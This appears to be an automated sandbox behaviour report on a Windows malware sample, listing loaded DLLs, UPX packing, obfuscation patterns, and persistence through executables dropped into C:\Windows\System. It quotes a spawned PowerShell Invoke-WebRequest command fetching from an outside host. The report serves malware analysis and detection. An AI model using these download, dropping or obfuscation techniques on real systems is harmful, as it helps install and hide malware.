Source: C:\Users\user\Desktop\file.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: unknown unknown	Jump to behavior

Source: C:\Users\user\Desktop\file.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: powrprof.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: umpdc.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dnsapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc6.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winnsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasapi32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasman.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rtutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mswsock.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winhttp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasadhlp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: schannel.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mskeyprotect.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncrypt.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncryptsslp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sxs.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mshtml.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: powrprof.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wkscli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: umpdc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msiso.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ieframe.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netapi32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mlang.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: d2d1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dwrite.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dxgi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: resourcepolicyclient.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: d3d11.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: d3d10warp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dxcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windowscodecs.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: imgutil.dll
Source: C:\Windows\System\xIpouRJ.exe	Section loaded: apphelp.dll
Source: C:\Windows\System\xIpouRJ.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System\ERbKWDm.exe	Section loaded: apphelp.dll
Source: C:\Windows\System\ERbKWDm.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System\wHnuprt.exe	Section loaded: apphelp.dll
Source: C:\Windows\System\wHnuprt.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System\uxMRJKa.exe	Section loaded: apphelp.dll
Source: C:\Windows\System\uxMRJKa.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System\bJVoOik.exe	Section loaded: apphelp.dll
Source: C:\Windows\System\bJVoOik.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System\wkazDeV.exe	Section loaded: apphelp.dll
Source: C:\Windows\System\wkazDeV.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System\VWrcuzM.exe	Section loaded: apphelp.dll
Source: C:\Windows\System\VWrcuzM.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System\wJNkgSa.exe	Section loaded: apphelp.dll
Source: C:\Windows\System\wJNkgSa.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System\imwRXsl.exe	Section loaded: apphelp.dll
Source: C:\Windows\System\imwRXsl.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System\bzSbRdi.exe	Section loaded: apphelp.dll
Source: C:\Windows\System\bzSbRdi.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System\Csmwgyb.exe	Section loaded: apphelp.dll
Source: C:\Windows\System\Csmwgyb.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System\defQfgC.exe	Section loaded: apphelp.dll
Source: C:\Windows\System\defQfgC.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System\XZxtJFw.exe	Section loaded: apphelp.dll
Source: C:\Windows\System\XZxtJFw.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System\MwFvbxc.exe	Section loaded: apphelp.dll
Source: C:\Windows\System\MwFvbxc.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System\hAOVVjq.exe	Section loaded: apphelp.dll
Source: C:\Windows\System\hAOVVjq.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System\oxCQuSo.exe	Section loaded: apphelp.dll
Source: C:\Windows\System\oxCQuSo.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System\vyHGCnK.exe	Section loaded: apphelp.dll
Source: C:\Windows\System\vyHGCnK.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System\mbSqRHL.exe	Section loaded: apphelp.dll
Source: C:\Windows\System\mbSqRHL.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System\VFkciqc.exe	Section loaded: apphelp.dll
Source: C:\Windows\System\VFkciqc.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System\sdTevgk.exe	Section loaded: apphelp.dll
Source: C:\Windows\System\sdTevgk.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System\eVVPPqR.exe	Section loaded: apphelp.dll
Source: C:\Windows\System\eVVPPqR.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System\VHwkuIa.exe	Section loaded: apphelp.dll
Source: C:\Windows\System\VHwkuIa.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System\WLWcTVM.exe	Section loaded: apphelp.dll
Source: C:\Windows\System\WLWcTVM.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System\WCbcoxD.exe	Section loaded: apphelp.dll
Source: C:\Windows\System\WCbcoxD.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System\QWtCxan.exe	Section loaded: apphelp.dll
Source: C:\Windows\System\QWtCxan.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System\fpHmIIc.exe	Section loaded: apphelp.dll
Source: C:\Windows\System\fpHmIIc.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System\FGSooXz.exe	Section loaded: apphelp.dll
Source: C:\Windows\System\FGSooXz.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System\mKdsHiQ.exe	Section loaded: apphelp.dll
Source: C:\Windows\System\mKdsHiQ.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System\nWSykjl.exe	Section loaded: apphelp.dll
Source: C:\Windows\System\nWSykjl.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System\LKurWpq.exe	Section loaded: apphelp.dll
Source: C:\Windows\System\LKurWpq.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System\iHSYLud.exe	Section loaded: apphelp.dll
Source: C:\Windows\System\iHSYLud.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System\tyQdqmC.exe	Section loaded: apphelp.dll
Source: C:\Windows\System\tyQdqmC.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System\sabRErB.exe	Section loaded: apphelp.dll
Source: C:\Windows\System\sabRErB.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System\ZTSJHKb.exe	Section loaded: apphelp.dll
Source: C:\Windows\System\ZTSJHKb.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System\xNhRSWh.exe	Section loaded: apphelp.dll
Source: C:\Windows\System\xNhRSWh.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System\jtnQpnb.exe	Section loaded: apphelp.dll
Source: C:\Windows\System\jtnQpnb.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System\hEUEsIC.exe	Section loaded: apphelp.dll
Source: C:\Windows\System\hEUEsIC.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System\UqXZtcb.exe	Section loaded: apphelp.dll
Source: C:\Windows\System\UqXZtcb.exe	Section loaded: kernel.appcore.dll

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Source: file.exe

Static PE information: Image base 0x140000000 > 0x60000000

Source: file.exe

Static file information: File size 1262731 > 1048576

Source: file.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE

Data Obfuscation

Suspicious powershell command line found

Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -command "Invoke-WebRequest "https://raw.githubusercontent.com/" "
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -command "Invoke-WebRequest "https://raw.githubusercontent.com/" "			Jump to behavior

Contains functionality to dynamically determine API calls

Source: C:\Windows\System\xIpouRJ.exe

Code function: 4_2_00007FF66685EBF0 GetModuleHandleA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetLastError,GetLastError,GetLastError,GetLastError,GetLastError,GetLastError,GetLastError,GetLastError,GetLastError,GetLastError,

4_2_00007FF66685EBF0

Uses code obfuscation techniques (call, push, ret)

Source: C:\Windows\System\xIpouRJ.exe	Code function: 4_2_00007FF666807FA3 push qword ptr [00007FF5F1C8AA28h]; retf	4_2_00007FF666807FA9
Source: C:\Windows\System\xIpouRJ.exe	Code function: 4_2_00007FF666808072 push qword ptr [00007FF5F1C8AAF7h]; retf	4_2_00007FF666808078
Source: C:\Windows\System\ERbKWDm.exe	Code function: 5_2_00007FF67DBD8072 push qword ptr [00007FF60905AAF7h]; retf	5_2_00007FF67DBD8078
Source: C:\Windows\System\ERbKWDm.exe	Code function: 5_2_00007FF67DBD7FA3 push qword ptr [00007FF60905AA28h]; retf	5_2_00007FF67DBD7FA9
Source: C:\Windows\System\wHnuprt.exe	Code function: 6_2_00007FF7C3B68072 push qword ptr [00007FF74EFEAAF7h]; retf	6_2_00007FF7C3B68078
Source: C:\Windows\System\wHnuprt.exe	Code function: 6_2_00007FF7C3B67FA3 push qword ptr [00007FF74EFEAA28h]; retf	6_2_00007FF7C3B67FA9
Source: C:\Windows\System\uxMRJKa.exe	Code function: 7_2_00007FF6BEA97FA3 push qword ptr [00007FF649F1AA28h]; retf	7_2_00007FF6BEA97FA9
Source: C:\Windows\System\uxMRJKa.exe	Code function: 7_2_00007FF6BEA98072 push qword ptr [00007FF649F1AAF7h]; retf	7_2_00007FF6BEA98078
Source: C:\Windows\System\bJVoOik.exe	Code function: 8_2_00007FF6B3CE8072 push qword ptr [00007FF63F16AAF7h]; retf	8_2_00007FF6B3CE8078
Source: C:\Windows\System\bJVoOik.exe	Code function: 8_2_00007FF6B3CE7FA3 push qword ptr [00007FF63F16AA28h]; retf	8_2_00007FF6B3CE7FA9
Source: C:\Windows\System\wkazDeV.exe	Code function: 9_2_00007FF68B318072 push qword ptr [00007FF61679AAF7h]; retf	9_2_00007FF68B318078
Source: C:\Windows\System\wkazDeV.exe	Code function: 9_2_00007FF68B317FA3 push qword ptr [00007FF61679AA28h]; retf	9_2_00007FF68B317FA9
Source: C:\Windows\System\VWrcuzM.exe	Code function: 10_2_00007FF748337FA3 push qword ptr [00007FF6D37BAA28h]; retf	10_2_00007FF748337FA9
Source: C:\Windows\System\VWrcuzM.exe	Code function: 10_2_00007FF748338072 push qword ptr [00007FF6D37BAAF7h]; retf	10_2_00007FF748338078

Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1

Persistence and Installation Behavior

Drops executables to the windows directory (C:\Windows) and starts them

Source: C:\Users\user\Desktop\file.exe	Executable created and started: C:\Windows\System\XZxtJFw.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Executable created and started: C:\Windows\System\sabRErB.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Executable created and started: C:\Windows\System\oxCQuSo.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Executable created and started: C:\Windows\System\fpHmIIc.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Executable created and started: C:\Windows\System\xIpouRJ.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Executable created and started: C:\Windows\System\mKdsHiQ.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Executable created and started: C:\Windows\System\ZTSJHKb.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Executable created and started: C:\Windows\System\hAOVVjq.exe	Jump to behavior
